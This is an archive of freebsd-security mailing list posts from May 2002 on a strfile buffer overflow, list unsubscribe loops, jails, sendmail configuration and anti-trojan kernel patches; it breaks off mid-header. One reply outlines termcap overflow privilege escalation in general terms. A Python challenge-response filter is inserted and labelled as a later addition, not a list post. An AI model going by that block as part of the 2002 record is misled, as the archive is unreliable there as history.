This isn't really surprising, since FreeBSD is run by volunteers, and unless they are either provided with a patch or convinced that an issue is vitally important, nothing is likely to happen. You've described a problem, worked out how to fix it, described how to fix it... but you haven't completed the final two steps: Generating a patch, and submitting it as part of a Problem Report. So, here's what you should do: 1. Generate a patch for src/games/fortune/strfile/strfile.c. This means running `diff -c` on the original file and your fixed version. 2. Use send-pr to generate a problem report. Make sure the synopsis field starts with [PATCH], and run send-pr with the -a option to include your patch file. 3. Wait until a committer notices your pr and incorporates your patch. 
I'd also suggest that you read http://www.freebsd.org/doc/en_US.ISO8859-1/articles/problem-reports/article.html and http://www.freebsd.org/doc/en_US.ISO8859-1/articles/contributing/contrib-how.html Colin Percival To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 15:38: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from malkavian.org (malkavian.org [206.136.132.23]) by hub.freebsd.org (Postfix) with ESMTP id A16DA37B405 for ; Sun, 5 May 2002 15:37:52 -0700 (PDT) Received: (from rbw@localhost) by malkavian.org (8.11.6/8.11.1) id g45Mbku02734 for security@FreeBSD.ORG; Sun, 5 May 2002 18:37:46 -0400 (EDT) (envelope-from rbw@myplace.org) Date: Sun, 5 May 2002 15:37:46 -0700 From: "brian j. peterson" To: security@FreeBSD.ORG Subject: Please stop trying to unsubscribe (Was: Re: You've Been Removed!) Message-ID: <20020505153746.C35748@malkavian.org> Mail-Followup-To: security@FreeBSD.ORG References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3CD59C0A.306681E3@fpsn.net>; from cfaber@fpsn.net on Sun, May 05, 2002 at 02:54:34PM -0600 X-URL: http://rbw.myplace.org/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, May 05, 2002 at 02:54:34PM -0600, Colin Faber wrote: > Maybe it's time to re-evaluate the way the list rules are setup? It > would appear there some some punk hell bent against this list. > > Possibly a subscribers only-post list? it'd be nice if people simply stopped loading the unsubscribe link... since it is also the resubscribe link. every other person trying to unsubscribe security@freebsd.org from the list has been actually resubscribing... 
generating more email... leading to another attempt to unsubscribe... generating more email... ad nauseum. -- --===-----=======-----------=============-----------------=================== bjp aka rbw | and did you exchange a walk on part in the war rbw@myplace.org | for a lead role in a cage? ===================-----------------=============-----------=======-----===-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 16:27:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from cithaeron.argolis.org (bgm-24-169-166-7.stny.rr.com [24.169.166.7]) by hub.freebsd.org (Postfix) with ESMTP id B754637B407 for ; Sun, 5 May 2002 16:27:29 -0700 (PDT) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.3/8.12.3) with ESMTP id g45NRPc7069038; Sun, 5 May 2002 19:27:25 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.3/8.12.3/Submit) with ESMTP id g45NROL4069035; Sun, 5 May 2002 19:27:24 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Sun, 5 May 2002 19:27:24 -0400 (EDT) From: Matt Piechota To: Colin Faber Cc: security@FreeBSD.ORG Subject: Re: You've Been Removed! In-Reply-To: <3CD59C0A.306681E3@fpsn.net> Message-ID: <20020505192605.M59456-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, 5 May 2002, Colin Faber wrote: > Maybe it's time to re-evaluate the way the list rules are setup? It > would appear there some some punk hell bent against this list. Maybe they're trying to DOS attack the Art Gallery List Server. 
:) -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun May 5 16:28:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from urdvg002.mx.net (urdvg002.mx.net [165.212.11.2]) by hub.freebsd.org (Postfix) with SMTP id 0784137B401 for ; Sun, 5 May 2002 16:28:25 -0700 (PDT) Received: (qmail 21000 invoked from network); 5 May 2002 23:28:04 -0000 Received: from imapcorp.postoffice.net (HELO uadvg201.cms.usa.net) (165.212.11.132) by corprelay.cms.usa.net with SMTP; 5 May 2002 23:28:04 -0000 Received: USA.NET MXFirewall, messaging filters applied; Sun, 05 May 2002 23:26:21 GMT Received: from uwdvg007.cms.usa.net [165.212.8.7] by uadvg132.cms.usa.net via mtad (CM.1201.1.04A) with ESMTP id 701geeXAR0289M32; Sun, 05 May 2002 23:26:17 GMT Message-ID: <20020505232818.29316.qmail@uwdvg007.cms.usa.net> Received: from 192.115.8.147 [192.115.8.147] by uwdvg007.cms.usa.net (USANET web-mailer CM.0402.1.01C); Sun, 05 May 2002 23:28:18 -0000 Date: Mon, 06 May 2002 00:28:18 +0100 From: ReDeeMeR To: Subject: Re: [Re: Buffer overflow in /usr/games/strfile] X-Mailer: USANET web-mailer (CM.0402.1.01C) Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I have now constructed a patch for this program and have sent it to FreeBSD as part of a Problem Report.

Thanks for your pointers, and for the two URLs ... next time I'll learn to RTFM a little more closely.
Thanks again,
ReDeeMeR

Colin Percival wrote:
> Given that this is not a security issue -- as you point out, "no extra
> privileges can be gained" -- this is rather off-topic for -security;
> nevertheless, it is less so than discussions of mailing list sender
> restrictions, so I'll go ahead and respond.
> If you look at
> http://www.freebsd.org/cgi/cvsweb.cgi/src/games/fortune/strfile/strfile.c
> you'll see the CVS log for the file in question. At present it shows that
> the latest change was made six weeks ago; your change has not been
> incorporated.
> This isn't really surprising, since FreeBSD is run by volunteers, and
> unless they are either provided with a patch or convinced that an issue is
> vitally important, nothing is likely to happen. You've described a
> problem, worked out how to fix it, described how to fix it... but you
> haven't completed the final two steps: Generating a patch, and submitting
> it as part of a Problem Report.
> So, here's what you should do:
> 1. Generate a patch for src/games/fortune/strfile/strfile.c. This means
> running `diff -c` on the original file and your fixed version.
> 2. Use send-pr to generate a problem report. Make sure the synopsis field
> starts with [PATCH], and run send-pr with the -a option to include your
> patch file.
> 3. Wait until a committer notices your pr and incorporates your patch.
>
> I'd also suggest that you read
> http://www.freebsd.org/doc/en_US.ISO8859-1/articles/problem-reports/article.html
> and
> http://www.freebsd.org/doc/en_US.ISO8859-1/articles/contributing/contrib-how.html
>
> Colin Percival
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun May 5 16:44:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from slc.edu (weir-01c.slc.edu [207.106.89.46]) by hub.freebsd.org (Postfix) with ESMTP id A3D6437B401 for ; Sun, 5 May 2002 16:44:34 -0700 (PDT) Received: (from anthony@localhost) by slc.edu (8.11.6/8.11.6) id g45NkhU00978; Sun, 5 May 2002 19:46:43 -0400 (EDT) (envelope-from anthony) Date: Sun, 5 May 2002 19:46:43 -0400 From: Anthony Schneider To: Colin Percival Cc: ReDeeMeR , FreeBSD-security@FreeBSD.ORG Subject: Re: Buffer overflow in /usr/games/strfile Message-ID: <20020505194643.A934@mail.slc.edu> References: <20020505213314.8762.qmail@uwdvg007.cms.usa.net> <5.0.2.1.1.20020505224651.00afbd78@popserver.sfu.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="TB36FDmn/VVEgNH/" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <5.0.2.1.1.20020505224651.00afbd78@popserver.sfu.ca>; from colin.percival@wadham.ox.ac.uk on Sun, May 05, 2002 at 11:27:49PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --TB36FDmn/VVEgNH/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

On Sun, May 05, 2002 at 11:27:49PM +0100, Colin Percival wrote:
> Given that this is not a security issue -- as you point out, "no extra
> privileges can be gained" -- this is rather off-topic for -security;
> nevertheless, it is less so than discussions of mailing list sender
> restrictions, so I'll go ahead and respond.

I agree that it is not an *active* security hazard, however, it is a potential security hazard were some other extra-privileged program to rely on strfile's functionality for whatever purpose (think termcap buffer overflows...termcap itself, a library, is not a setuid application, but xterm, which runs setuid root, relies on termcap, and buffer overflows have occurred where a user crafts a malicious termcap file and launches xterm, overflowing a buffer in some termcap routine, and getting dropped to a shell with the same privileges that xterm was run under).

/$.02
-Anthony.

-----------------------------------------------
PGP key at:
http://www.keyserver.net/
http://www.anthonydotcom.com/gpgkey/key.txt
Home: http://www.anthonydotcom.com
-----------------------------------------------

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun May 5 16:53:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f145.law9.hotmail.com [64.4.9.145]) by hub.freebsd.org (Postfix) with ESMTP id B451437B400 for ; Sun, 5 May 2002 16:53:13 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sun, 5 May 2002 16:53:13 -0700 Received: from 131.211.221.28 by lw9fd.law9.hotmail.msn.com with HTTP; Sun, 05 May 2002 23:53:13 GMT X-Originating-IP: [131.211.221.28] From: "Maarten M."
To: jedgar@fxp.org
Cc: freebsd-security@FreeBSD.org
Subject: Re: Jail() in 4.6-pre*
Date: Mon, 06 May 2002 01:53:13 +0200

>On Sat, May 04, 2002 at 02:31:00PM -0400, Michael Sharp wrote:
> > I used jail in 4.5-STABLE ( following man jail ), but today I went
> > ahead and cvsup'ed to 4.6-pre*, made world, etc... no errors...
> > followed man jail... no errors until:
> >
> > cd /path/to/jail/dev; sh MAKEDEV jail gave me :
> > MAKEDEV unknown file or directory.
> >
> > MAKEDEV isn't even on the system.
> >
> > Is Jail not working in 4.6* yet, or has something changed with MAKEDEV?

It seems that I have the same problem unfortunately.

>
>This appears to be related to changes made in etc/Makefile revs.
>1.219.2.27/1.247 where NO_MAKEDEV does not install MAKEDEV anymore
>instead of only not running 'sh MAKEDEV all'. It appears we need to
>MFC src/usr.sbin/jail/jail.8 rev. 1.24 to reflect this.
>
>For the present time, use:
>
># make distribution DESTDIR=$D -DNO_MAKEDEV_RUN

When I use this I'm still getting an error :

make: don't know how to make distribution. Stop
How can I fix this?

mbmidden.

From owner-freebsd-security Sun May 5 17:14:15 2002
Date: Sun, 5 May 2002 17:13:34 -0700 (PDT)
From: Matthew Dillon
Message-Id: <200205060013.g460DYn54044@apollo.backplane.com>
To: Nils Holland
Cc: Colin Faber, security@FreeBSD.ORG
Subject: Re: You've Been Removed!
References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org>

I think the lists should remain open. A perfect solution would be
to have the mail system keep a database of originators (From: and
the first Received: header). Whenever it sees an email from someone
not in the database it would request that the person acknowledge
that they really intended to send the email and, if they do, their
email goes through and they are added to the database (so it only
asks them once).

I've been contemplating writing such a beast for myself, since 90%
of the email I receive these days is spam. I'm sure others have
written similar things so I'm wondering if there is a solution out
there already. At some point I'm going to write mine (as a standalone
MX relay so it could be tied into any system), when I have more time
available.

-Matt

:This issue comes up every now and then, mostly when viruses or other spam
:gets sent to the FreeBSD lists (though this constantly repeating "You've
:been added / You've been removed) thing was the most interesting thing I
:saw in the last few months ;-)
:
:Anyway, my opinion has always been that *all* FreeBSD lists should be in
:"subscribers may only post" mode, while FreeBSD-questions should remain
:open for all, as many people only see that list's address mentioned in the
:default motd and post messages to it without wanting to be constantly
:signed up. However, for the other FreeBSD lists where the majority of
:users are not "I-only-post-when-I-have-a-problem" folks, but rather
:"core members" (i.e. constantly subscribed), I guess that if these list
:only granted posting access to subscribers, a lot of hassles could be
:saved.
:
:Greetings
:Nils
:
:--
:
:Nils Holland

From owner-freebsd-security Sun May 5 17:15:47 2002
Date: Sun, 5 May 2002 20:15:39 -0400
From: Chris Faulhaber
To: "Maarten M."
Cc: jedgar@fxp.org, freebsd-security@FreeBSD.org
Subject: Re: Jail() in 4.6-pre*
Message-ID: <20020506001539.GA93411@peitho.fxp.org>

On Mon, May 06, 2002 at 01:53:13AM +0200, Maarten M. wrote:
> >For the present time, use:
> >
> ># make distribution DESTDIR=$D -DNO_MAKEDEV_RUN
>
> When I use this I'm still getting an error :
>
> make: don't know how to make distribution. Stop
> How can I fix this?
>

Fix your sources? If you cannot 'make distribution' in /usr/src/etc,
something else is screwed.

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Sun May 5 17:27:48 2002
Message-Id: <5.1.0.14.2.20020505192603.03dccc20@pop3s.schulte.org>
Date: Sun, 05 May 2002 19:27:35 -0500
To: Matthew Dillon, Nils Holland
From: Christopher Schulte
Subject: Re: You've Been Removed!
Cc: Colin Faber , security@FreeBSD.ORG In-Reply-To: <200205060013.g460DYn54044@apollo.backplane.com> References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:13 PM 5/5/2002 -0700, Matthew Dillon wrote: > I think the lists should remain open. A perfect solution would be > to have the mail system keep a database of originators (From: and > the first Received: header). Whenever it sees an email from someone > not in the database it would request that the person acknowledge > that they really intended to send the email and, if they do, their > email goes through and they are added to the database (so it only > asks them once). > > I've been contemplating writing such a beast for myself, since 90% > of the email I receive these days is spam. I'm sure others have > written similar things so I'm wondering if there is a solution out > there already. At some point I'm going to write mine (as a standalone > MX relay so it could be tied into any system), when I have more time > available. Never used it personally, but this seems to do what you describe: /usr/ports/mail/tmda http://tmda.sourceforge.net/ > -Matt -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. 
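
The confirm-once scheme Matthew Dillon describes in this thread (a database of originators keyed on From: and the first Received: header, with a one-time acknowledgement), written out as an added example; it is not TMDA's code and was not posted to the list. The HMAC token, the in-memory store, the limits, the sample messages and the rule that bulk or auto-generated mail is held without a challenge are assumptions of this example.

```python
import hashlib
import hmac
import re
import time
from email import message_from_string
from email.utils import parseaddr

SECRET = b"constructed-demo-secret"  # assumption: per-site key, loaded from protected storage
TOKEN_TTL = 7 * 24 * 3600            # assumption: a challenge stays valid for one week
MAX_HELD = 5                         # assumption: cap on held mail per unconfirmed originator

# Peer address that the receiving MX recorded in the topmost Received: header.
_PEER = re.compile(r"from\s+\S+\s+\([^)]*\[([^\]]+)\]")

# Constructed sample messages (documentation addresses, not real traffic).
FIRST_POST = """\
Received: from relay.example.org (relay.example.org [192.0.2.10])
\tby mx.example.net (Postfix) with ESMTP id CONSTRUCTED01
From: Alice Example <alice@example.org>
Subject: jail question

Hello list.
"""

AUTO_REPLY = """\
Received: from lists.example.com (lists.example.com [198.51.100.7])
\tby mx.example.net (Postfix) with ESMTP id CONSTRUCTED02
From: Subscription Robot <robot@example.com>
Precedence: bulk
Subject: You've Been Removed!

You have been removed from the list.
"""


def originator(msg):
    """Database key from the thread: From: address plus the first Received: header's peer."""
    addr = parseaddr(msg.get("From", ""))[1].lower()
    received = msg.get_all("Received") or [""]
    match = _PEER.search(received[0])
    return addr, match.group(1) if match else "unknown"


def is_automated(msg):
    """Bounces, bulk mail and auto-replies are never challenged (avoids responder loops)."""
    if msg.get("Return-Path", "").strip() == "<>":
        return True
    if msg.get("Auto-Submitted", "no").strip().lower() != "no":
        return True
    return msg.get("Precedence", "").strip().lower() in {"bulk", "junk", "list"}


def _mac(key, expires):
    # Binds the token to one originator and one expiry time.
    data = f"{key[0]}|{key[1]}|{expires}".encode()
    return hmac.new(SECRET, data, hashlib.sha256).hexdigest()


class ConfirmOnceGate:
    """In-memory stand-in for the originator database and the hold queue."""

    def __init__(self, now=time.time):
        self.now = now
        self.known = set()      # confirmed originators
        self.held = {}          # originator -> raw messages awaiting confirmation
        self.challenged = {}    # originator -> expiry of the outstanding challenge

    def receive(self, raw):
        """Return ("deliver", None), ("challenge", token) or ("hold", None)."""
        msg = message_from_string(raw)
        key = originator(msg)
        if key in self.known:
            return "deliver", None
        queue = self.held.setdefault(key, [])
        if len(queue) < MAX_HELD:
            queue.append(raw)
        if is_automated(msg) or self.challenged.get(key, 0) > self.now():
            return "hold", None
        expires = int(self.now()) + TOKEN_TTL
        self.challenged[key] = expires
        return "challenge", f"{expires}.{_mac(key, expires)}"

    def confirm(self, addr, peer, token):
        """Check a returned token; on success whitelist the sender and release held mail."""
        key = (addr.lower(), peer)
        try:
            expires_text, mac = token.split(".", 1)
            expires = int(expires_text)
        except ValueError:
            return []
        expected = _mac(key, expires)
        if expires < self.now() or not hmac.compare_digest(mac.encode(), expected.encode()):
            return []
        self.known.add(key)
        self.challenged.pop(key, None)
        return self.held.pop(key, [])
```

Because the key includes the relay address, a confirmed sender who later posts through a different relay is challenged again, which is the cost of keying on the first Received: header as described.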

From owner-freebsd-security Sun May 5 17:55:14 2002
Date: Mon, 6 May 2002 02:55:31 +0200
From: "Karsten W. Rohrbach"
To: Christopher Schulte
Cc: Matthew Dillon, Nils Holland, Colin Faber, security@FreeBSD.ORG
Subject: Re: You've Been Removed!
Message-ID: <20020506025531.A83460@mail.webmonster.de>
References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org> <200205060013.g460DYn54044@apollo.backplane.com> <5.1.0.14.2.20020505192603.03dccc20@pop3s.schulte.org>
In-Reply-To: <5.1.0.14.2.20020505192603.03dccc20@pop3s.schulte.org>; from schulte+freebsd@nospam.schulte.org on Sun, May 05, 2002 at 07:27:35PM -0500

Christopher Schulte(schulte+freebsd@nospam.schulte.org)@2002.05.05 19:27:35 +0000:
> Never used it personally, but this seems to do what you describe:
>
> /usr/ports/mail/tmda
> http://tmda.sourceforge.net/

for high-volume mailing lists you'll need quite some horsepowers in the
corresponding server. tmda is a python program which is invoked for
every single mail. having used tmda myself for a while i thought about
two alternative approaches which might yield better performance:
- implement a lightweight "subscription filter" in C
- take tmda and make a server process out of it, with a lightweight
  wrapper you can stick into a .forward or similar file, so the main
  rule engine stays there as a sleeping daemon all the time

just some rough ideas (as usual, after midnight)...
tell me what you think about them

/k

--
> Sex is one of the nine reasons for reincarnation ... the other eight
> are unimportant. --Henry Miller
WebMonster Community Project -- Next Generation Networks GmbH -- All on BSD
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
GnuPG: 0xDEC948A6 D/E BF11 83E8 84A1 F996 68B4 A113 B393 6BF4 DEC9 48A6
REVOKED: 0x2964BF46 D/E 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
REVOKED: 0x4C44DA59 RSA F9 A0 DF 91 74 07 6A 1C 5F 0B E0 6B 4D CD 8C 44
My mail is GnuPG signed -- Unsigned ones are bogus -- http://www.gnupg.org/
Please do not remove my address from To: and Cc: fields in mailing lists. 10x

From owner-freebsd-security Sun May 5 19: 5: 2 2002
Message-ID: <3CD5E4BD.10A3467@fpsn.net>
Date: Sun, 05 May 2002 20:04:45 -0600
From: Colin Faber
Organization: fpsn.net, Inc. (http://www.fpsn.net)
To: "Karsten W. Rohrbach"
Cc: Christopher Schulte, Matthew Dillon, Nils Holland, security@FreeBSD.ORG
Subject: Re: You've Been Removed!
References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org> <200205060013.g460DYn54044@apollo.backplane.com> <5.1.0.14.2.20020505192603.03dccc20@pop3s.schulte.org> <20020506025531.A83460@mail.webmonster.de>

This can easily be done with sendmail's milter

"Karsten W.
Rohrbach" wrote: > > Christopher Schulte(schulte+freebsd@nospam.schulte.org)@2002.05.05 19:27:35 +0000: > > Never used it personally, but this seems to do what you describe: > > > > /usr/ports/mail/tmda > > http://tmda.sourceforge.net/ > > for high-volume mailing lists you'll need quite some horsepowers in the > corresponding server. tmda is a python program which is invoked for > every single mail. having used tmda myself for a while i thought about > two alternative approaches which might yield better performance: > - implement a lightweight "subscription filter" in C > - take tmda and make a server process out of it, with a lightweight > wrapper you can stick into a .forward or similar file, so the main > rule engine stays there as a sleeping daemon all the time > > just some rough ideas (as usual, after midnight)... > tell me what you think about them > > /k > > -- > > Sex is one of the nine reasons for reincarnation ... the other eight > > are unimportant. --Henry Miller > WebMonster Community Project -- Next Generation Networks GmbH -- All on BSD > http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/ > GnuPG: 0xDEC948A6 D/E BF11 83E8 84A1 F996 68B4 A113 B393 6BF4 DEC9 48A6 > REVOKED: 0x2964BF46 D/E 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46 > REVOKED: 0x4C44DA59 RSA F9 A0 DF 91 74 07 6A 1C 5F 0B E0 6B 4D CD 8C 44 > My mail is GnuPG signed -- Unsigned ones are bogus -- http://www.gnupg.org/ > Please do not remove my address from To: and Cc: fields in mailing lists. 10x > > ------------------------------------------------------------------------ > Part 1.2Type: application/pgp-signature -- Colin Faber (303) 736-5160 fpsn.net, Inc. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 20: 3:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from stuff.webintl.com (stuff.webintl.com [209.248.144.10]) by hub.freebsd.org (Postfix) with ESMTP id 5841237B400 for ; Sun, 5 May 2002 20:03:05 -0700 (PDT) Received: from [192.168.123.20] (adsl-66-136-237-161.dsl.ltrkar.swbell.net [66.136.237.161]) by stuff.webintl.com (8.9.3/8.9.3) with ESMTP id WAA24520 for ; Sun, 5 May 2002 22:03:03 -0500 Mime-Version: 1.0 X-Sender: freebsd@mail.webintl.com Message-Id: Date: Sun, 5 May 2002 22:03:02 -0500 To: freebsd-security@freebsd.org From: Albert Everett Subject: jails and sendmail Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I've got a machine with three or four jails on it. I'd like to run sendmail in all of them. One jail will do Mailman, another will do email forwarding for clients, another will have an imap server in it, etc. On the host itself, I have in rc.conf: sendmail_enable="NO", instead of "NONE", to allow cron stuff to get mail out. I'd like to have sendmail_enable="YES" in each of my jails. Right now, sendmail doesn't seem to want to start in my jails with ="YES". Is it necessary to tell sendmail inside a jail to listen only on that jail's IP? If so, how is this done? I'm hoping a line or two in the .mc file will do it, but I'm new to editing these files. Is there a problem with the localhost sendmail config being shared around the jails, since localhost really belongs to the host itself (if I understand localhost correctly)? Albert -- ----------------------------------------------------------------------- Albert Everett - Web International, Inc. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 20:29: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id B4C2337B407 for ; Sun, 5 May 2002 20:29:01 -0700 (PDT) Received: from horsey.gshapiro.net (gshapiro@localhost [IPv6:::1]) by horsey.gshapiro.net (8.12.3/8.12.3) with ESMTP id g463T0Sd009218 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Sun, 5 May 2002 20:29:01 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.3/8.12.3/Submit) id g463T0HA009215; Sun, 5 May 2002 20:29:00 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15573.63612.505244.465190@horsey.gshapiro.net> Date: Sun, 5 May 2002 20:29:00 -0700 From: Gregory Neil Shapiro To: Albert Everett Cc: freebsd-security@FreeBSD.ORG Subject: Re: jails and sendmail In-Reply-To: References: X-Mailer: VM 7.00 under 21.1 (patch 14) "Cuyahoga Valley" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org freebsd> Is it necessary to tell sendmail inside a jail to listen only on that freebsd> jail's IP? If so, how is this done? I'm hoping a line or two in the freebsd> .mc file will do it, but I'm new to editing these files. No, but you need to make sure that the "host" system's sendmail isn't listening on the jail's IP addresses using DAEMON_OPTIONS(). I run a jail system which houses 1 "host" system and three jails. Each of the jail's .mc files are pretty much the same as /etc/mail/freebsd.mc. 
The "host" system (zim.gshapiro.net is its hostname) .mc file is:

OSTYPE(`freebsd4')dnl
define(`confDONT_PROBE_INTERFACES', `True')dnl
dnl Listen only on the host's own address and on localhost, so the
dnl jails' addresses stay free for the sendmail running in each jail.
DAEMON_OPTIONS(`Name=gshapiro.net, Addr=zim.gshapiro.net, Family=inet')dnl
DAEMON_OPTIONS(`Name=localhost, Addr=localhost, Family=inet')dnl
dnl Do not add the default MSA listener.
FEATURE(`no_default_msa')dnl
MAILER(`local')dnl
MAILER(`smtp')dnl

From owner-freebsd-security Sun May 5 22: 9:14 2002
Message-ID: <3CD6100D.1BC0890@netxsecure.net>
Date: Mon, 06 May 2002 17:09:33 +1200
From: "Michael A.
Williams" Reply-To: mike@netxsecure.net X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.4-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd security Subject: Updated Anti-Trojan kernel patches for FreeBSD 5.0 DP1 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Updated kernel option signed_exec patches for FreeBSD 5.0 DP1 Developer Preview One are available from: http://www.trojanproof.org/sigexec-fbsd5.0dp1-0.1.tgz These patches have been tested against 5.0 DP1 The relevant CVS tags are: $FreeBSD: src/sys/i386/conf/GENERIC,v 1.335 2002/02/13 18:47:50 alfred Exp $ $FreeBSD: src/sys/conf/options,v 1.304 2002/03/12 04:00:11 jeff Exp $ $FreeBSD: src/sys/kern/kern_exec.c,v 1.154 2002/02/27 20:57:57 imp Exp $ $FreeBSD: src/sys/kern/kern_linker.c,v 1.79 2002/03/10 23:12:43 dwmalone Exp $ Regards, -- Michael A. Williams Security Software Engineering and InfoSec Manager NetXSecure NZ Limited, http://www.nxs.co.nz Ph: +64.3.318.2973 Fax: +64.3.318.2975 Mob: +64.21.995.914 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 22:17:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by hub.freebsd.org (Postfix) with ESMTP id A0A5937B405 for ; Sun, 5 May 2002 22:17:20 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1192) id 745A6AE147; Sun, 5 May 2002 22:17:20 -0700 (PDT) Date: Sun, 5 May 2002 22:17:20 -0700 From: Alfred Perlstein To: "Michael A. 
Williams" Cc: freebsd security Subject: Re: Updated Anti-Trojan kernel patches for FreeBSD 5.0 DP1 Message-ID: <20020506051720.GA36741@elvis.mu.org> References: <3CD6100D.1BC0890@netxsecure.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3CD6100D.1BC0890@netxsecure.net> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Michael A. Williams [020505 22:09] wrote: > Hi, > > Updated kernel option signed_exec patches for FreeBSD 5.0 DP1 Developer > Preview One are available from: > > http://www.trojanproof.org/sigexec-fbsd5.0dp1-0.1.tgz > > These patches have been tested against 5.0 DP1 For the completely lazy amongst us, can you please provide a url that _explains_ what these patches do? :) -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 22:38:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.sambolian.net.nz (203-79-83-205.cable.paradise.net.nz [203.79.83.205]) by 